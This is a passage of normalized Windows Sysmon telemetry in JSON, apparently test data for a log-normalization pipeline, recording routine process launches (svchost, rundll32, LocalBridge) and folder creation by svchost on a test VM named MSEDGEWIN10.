"AA4D0C64AC44EA11BCEC87CF7A73BC479DB9047C21D544341B07558E0C1773B5", "object.process.id": "7000", "object.process.meta": "Description:LocalBridge | Product:LocalBridge | Company:", "object.process.name": "localbridge.exe", "object.process.original_name": "LocalBridge.exe", "object.process.parent.cmdline": "C:\\Windows\\System32\\RuntimeBroker.exe -Embedding", "object.process.parent.fullpath": "c:\\windows\\system32\\runtimebroker.exe", "object.process.parent.guid": "747f3d96-b776-5ea4-0000-001025270b00", "object.process.parent.id": "6924", "object.process.parent.name": "runtimebroker.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\program files\\windowsapps\\microsoft.microsoftofficehub_18.2002.1101.0_x64__8wekyb3d8bbwe\\", "object.process.version": "18.2002.1101.0", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "119707", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:34.611Z", "type": "raw", "uuid": "80df3887-10d2-43d6-afb7-612188970788"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:40.6929242Z\"},\"EventRecordID\":\"27840\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:34.549\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b776-5ea4-0000-0010a74d0b00}\"},{\"Name\":\"ProcessId\",\"text\":\"6964\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b776-5ea4-0000-0010a74d0b00", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "6964", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:34.549Z", "type": "raw", "uuid": "d100e07f-0543-4902-b5ee-382080b6384c"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:37.2091896Z\"},\"EventRecordID\":\"27803\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:27.149\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b76f-5ea4-0000-0010624d0600}\"},{\"Name\":\"ProcessId\",\"text\":\"5840\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\rundll32.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows host process (Rundll32)\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"RUNDLL32.EXE\"},{\"Name\":\"CommandLine\",\"text\":\"rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00209bd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d39b\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b769-5ea4-0000-001000800300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4472\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k wsappx -p -s AppXSvc\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00209bd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "119707", "object.process.cmdline": "rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\rundll32.exe", "object.process.guid": "747f3d96-b76f-5ea4-0000-0010624d0600", "object.process.hash.imphash": "F27A7FC3A53E74F45BE370131953896A", "object.process.hash.md5": "C73BA51880F5A7FB20C84185A23212EF", "object.process.hash.sha1": "F3BA3415DD068A8871F285570BEA2E29874CBFF1", "object.process.hash.sha256": "01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A", "object.process.id": "5840", "object.process.meta": "Description:Windows host process (Rundll32) | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "rundll32.exe", "object.process.original_name": "RUNDLL32.EXE", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k wsappx -p -s AppXSvc", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-b769-5ea4-0000-001000800300", "object.process.parent.id": "4472", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "119707", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:27.149Z", "type": "raw", "uuid": "c1fcfe54-7ecd-4af4-becf-1f9fdf8aca31"} +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:36.9848187Z\"},\"EventRecordID\":\"27797\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:26.766\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b76e-5ea4-0000-001034090600}\"},{\"Name\":\"ProcessId\",\"text\":\"5632\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Windows\\\\ServiceProfiles\\\\LocalService\\\\AppData\\\\Local\\\\Packages\\\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\\\AC\\\\INetCookies\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2020-04-25 22:19:26.766\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\packages\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\ac\\inetcookies", "object.name": "inetcookies", "object.path": "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\packages\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\ac\\", "object.property": "creation time", "object.value": "2020-04-25T22:19:26.766Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\svchost.exe", "subject.process.guid": "747f3d96-b76e-5ea4-0000-001034090600", "subject.process.id": "5632", "subject.process.name": "svchost.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:26.766Z", "type": "raw", "uuid": "78e924f8-36e1-4151-bf97-f614aa89f4a8"} +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:36.9847196Z\"},\"EventRecordID\":\"27796\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:26.766\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b76e-5ea4-0000-001034090600}\"},{\"Name\":\"ProcessId\",\"text\":\"5632\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Windows\\\\ServiceProfiles\\\\LocalService\\\\AppData\\\\Local\\\\Packages\\\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\\\AC\\\\INetHistory\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2020-04-25 22:19:26.766\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\packages\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\ac\\inethistory", "object.name": "inethistory", "object.path": "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\packages\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\ac\\", "object.property": "creation time", "object.value": "2020-04-25T22:19:26.766Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\svchost.exe", "subject.process.guid": "747f3d96-b76e-5ea4-0000-001034090600", "subject.process.id": "5632", "subject.process.name": "svchost.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:26.766Z", "type": "raw", "uuid": "ec72fc44-870e-4ad2-b13f-2abb31fd0ee6"} +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:36.9846501Z\"},\"EventRecordID\":\"27795\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:26.766\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b76e-5ea4-0000-001034090600}\"},{\"Name\":\"ProcessId\",\"text\":\"5632\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Windows\\\\ServiceProfiles\\\\LocalService\\\\AppData\\\\Local\\\\Packages\\\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\\\AC\\\\INetCache\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2020-04-25 22:19:26.766\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\packages\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\ac\\inetcache", "object.name": "inetcache", "object.path": "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\packages\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\ac\\", "object.property": "creation time", "object.value": "2020-04-25T22:19:26.766Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\svchost.exe", "subject.process.guid": "747f3d96-b76e-5ea4-0000-001034090600", "subject.process.id": "5632", "subject.process.name": "svchost.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:26.766Z", "type": "raw", "uuid": "e0b176e9-8b9c-4682-bfd0-cfbbd935f90d"} +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:36.9845792Z\"},\"EventRecordID\":\"27794\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:26.766\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b76e-5ea4-0000-001034090600}\"},{\"Name\":\"ProcessId\",\"text\":\"5632\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Windows\\\\ServiceProfiles\\\\LocalService\\\\AppData\\\\Local\\\\Packages\\\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\\\AC\\\\Temp\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2020-04-25 22:19:26.766\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\packages\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\ac\\temp", "object.name": "temp", "object.path": "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\packages\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\ac\\", "object.property": "creation time", "object.value": "2020-04-25T22:19:26.766Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\svchost.exe", "subject.process.guid": "747f3d96-b76e-5ea4-0000-001034090600", "subject.process.id": "5632", "subject.process.name": "svchost.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:26.766Z", "type": "raw", "uuid": "bbd93aee-556d-4153-92cb-fec3c7b0d35b"} +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:36.9843101Z\"},\"EventRecordID\":\"27793\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:26.750\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b76e-5ea4-0000-001034090600}\"},{\"Name\":\"ProcessId\",\"text\":\"5632\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Windows\\\\ServiceProfiles\\\\LocalService\\\\AppData\\\\Local\\\\Packages\\\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\\\AC\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2020-04-25 22:19:26.750\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\packages\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\ac", "object.name": "ac", "object.path": "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\packages\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\\", "object.property": "creation time", "object.value": "2020-04-25T22:19:26.750Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\svchost.exe", "subject.process.guid": "747f3d96-b76e-5ea4-0000-001034090600", "subject.process.id": "5632", "subject.process.name": "svchost.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:26.750Z", "type": "raw", "uuid": "f12acd47-4470-4740-b1c9-42e18b7e0b80"} +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:36.9841653Z\"},\"EventRecordID\":\"27792\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:26.750\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b76e-5ea4-0000-001034090600}\"},{\"Name\":\"ProcessId\",\"text\":\"5632\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Windows\\\\ServiceProfiles\\\\LocalService\\\\AppData\\\\Local\\\\Packages\\\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2020-04-25 22:19:26.750\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\packages\\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe", "object.name": "warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe", "object.path": 